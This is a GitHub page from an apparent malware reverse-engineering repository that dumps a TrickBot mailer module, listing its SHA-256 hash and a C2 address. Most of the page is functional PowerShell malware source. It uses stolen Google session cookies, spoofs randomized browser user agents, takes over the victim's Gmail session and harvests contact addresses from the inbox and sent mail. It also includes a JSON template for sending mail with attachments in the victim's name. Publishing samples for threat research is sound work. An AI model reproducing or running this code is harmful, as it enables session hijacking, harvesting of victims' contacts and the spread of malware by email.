Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Malware-Misc-RE/2019-07-08-trickbot-mailer.vk.txt

Go to file
 
 
Cannot retrieve contributors at this time
129 lines (95 sloc) 6.21 KB
Raw Blame
Open in GitHub Desktop
SHA-256: d96fd330c765b88f3503899755624cbe020ab3e2c53e28d7dee38e7b35f3eab2
C2: C2: 185.86.148[.]63:2050
Example
Content-Disposition: form-data; name="batchJson"
Content-Type: application/json`r`n
{"requests":[{"id":"SaveMessage","uri":"/ws/v3/mailboxes/@.id==$folderId/messages","method":"POST","payloadType":"multipart","payloadParts":[{"partName":"jsonString","contentType":"application/json","payload":{"actions":{"responseMessage":true},"message":{"csid":"$csid","newMessage":true,"headers":{"subject":"$subject","from":[{"name":"$fromName","email":"$mymail"}],"replyTo":[],"to":[$toSingle],"cc":[],"bcc":[$bccArray]},"folder":{"id":"3"},"flags":{"spam":"false","read":"true"}},"simpleBody":{"attachments":[$attachments],"html":"$body"}}}],"filters":{"select":{"messageId":"$..message.immutableid","csid":"$..message.csid","cid":"$..message.conversationId"}},"requests":[{"id":"GetSimpleBody","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.id==`$(messageId)/content/simplebody/full/secure","method":"GET","payloadType":"embedded"},{"id":"SendMessage","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.id==`$(messageId)/send","method":"POST","payloadType":"embedded","payload":{"csid":"`$(csid)","destinationFolder":{"id":"2"}},"requests":[{"id":"GetMessageGroupList","uri":"/ws/v3/mailboxes/@.id==$folderId/messages/@.select==q?q=%20groupBy%3AconversationId%20count%3A1%20offset%3A0%20conversationId%3A(`$(cid))","method":"GET","payloadType":"embedded"}]}]}],"responseType":"json"}
Grab -> Send -> GetMIMEType
Function Grab {
[cmdletbinding()]
param(
[bool]$collectFromInbox,
[bool]$collectFromOutbox,
[bool]$collectFromAddressBook,
[bool]$collectFromFolders,
[System.Object]$cookies
)
process {
Add-Type -AssemblyName System.Web;
# SID
if (-not $cookies["SID"]) { return Write-Error "Cookie SID not found"; }
# HSID
if (-not $cookies["HSID"]) { return Write-Error "Cookie HSID not found"; }
# SSID
if (-not $cookies["SSID"]) { return Write-Error "Cookie SSID not found"; }
# NID
if (-not $cookies["NID"]) { return Write-Error "Cookie NID not found"; }
# OSID
if (-not $cookies["OSID"]) { return Write-Error "Cookie OSID not found"; }
# get addresses from inbox
$emails = @();
# setup settings
$wc = New-Object system.Net.WebClient;
$wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, (
"SID=" + $cookies["SID"][0] +
"; HSID=" + $cookies["HSID"][0] +
"; SSID=" + $cookies["SSID"][0] +
"; OSID=" + $cookies["OSID"][0] +
"; NID=" + $cookies["NID"][0]));
$wc.Encoding = [System.Text.Encoding]::UTF8;
# FINGER PRINT
$ntVersion = @("3.1", "3.5", "3.51", "4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0");
$userAgentFirefox = @("Mozilla/5.0 (Windows NT {0}; rv:{1}.0) Gecko/20100101 Firefox/{1}.0", "Mozilla/5.0 (Windows NT {0}; Win64; x64; rv:{1}.0) Gecko/20100101 Firefox/{1}.0", "Mozilla/5.0 (Windows NT {0}; WOW64; rv:{1}.0) Gecko/20100101 Firefox/{1}.0");
$userAgentChrome = @("Mozilla/5.0 (Windows NT {0}; WOW64) AppleWebKit/{2}.{3} (KHTML, like Gecko) Chrome/{1}.0.3202.94 Safari/{2}.{3}");
$userAgent = @((Get-Random -minimum 0 -maximum 2), (Get-Random -minimum 0 -maximum 3), (Get-Random -minimum 0 -maximum 12));
if ($userAgent[0] -eq 0)
{
$userAgent = [system.string]::format($userAgentFirefox[$userAgent[1]], $ntVersion[$userAgent[2]], (Get-Random -minimum 50 -maximum 66))
} else {
$userAgent = [system.string]::format($userAgentChrome[0], $ntVersion[$userAgent[2]], (Get-Random -minimum 50 -maximum 62), (Get-Random -minimum 500 -maximum 700), (Get-Random -minimum 0 -maximum 100))
}
$wc.Headers.Add("User-Agent", $userAgent);
# ik param for next request
$ik = $wc.downloadString("https://mail.google.com/mail/");
$matches = (New-Object System.Text.RegularExpressions.Regex('var GLOBALS=\[.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,\"(.+?)\",', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($ik);
$mymail = (New-Object System.Text.RegularExpressions.Regex('var GLOBALS=\[.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?\,.+?,\"(.+?)\",', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($ik);
$mymail = $mymail[0].Groups[1].Value;
$ik = $matches[0].Groups[1].Value;
# debug headers
#For ($i=0; $i -lt $wc.Headers.Count; $i++) {Write-Output($wc.Headers.Keys[$i] + ":" + $wc.Headers[$i])}#: $wc.Headers.Get($i); }
if($collectFromInbox) {
# get inbox mails
$res = $wc.UploadString("https://mail.google.com/mail/?ik=" + $ik + "&view=tl&start=0&num=100000000&rt=c&search=inbox", 'POST');
# parse mails
$matches = (New-Object System.Text.RegularExpressions.Regex('email\\u003d\\\"(.+?)\\\"', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($res);
For ($i=0; $i -lt $matches.Count; $i++) { $emails += $matches[$i].Groups[1].Value; }
}
# get addresses from outbox
if($collectFromOutbox) {
# get inbox outbox mails
$res = $wc.UploadString("https://mail.google.com/mail/?ik=" + $ik + "&view=tl&start=0&num=100000000&rt=c&search=sent", 'POST');
# parse mails
$matches = (New-Object System.Text.RegularExpressions.Regex('email\\u003d\\\"(.+?)\\\"', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)).matches($res);
For ($i=0; $i -lt $matches.Count; $i++) { $emails += $matches[$i].Groups[1].Value; }
}
# get addresses from address book
if($collectFromAddressBook) {
# end
}
#get addresses from folders
if($collectFromFolders) {
# end
}
#Remove duplicates
$tmpEms = $emails;
$emails = @();
For ($i=0; $i -lt $tmpEms.Count; $i++) {
$isSet = $false;
For ($l=0; $l -lt $emails.Count; $l++) {
if ($tmpEms[$i] -eq $emails[$l]){ $isSet = $true; }
}
if ($isSet -eq $false -and $tmpEms[$i] -ne $mymail){ $emails += $tmpEms[$i]; }
}
write-output $emails;
}
}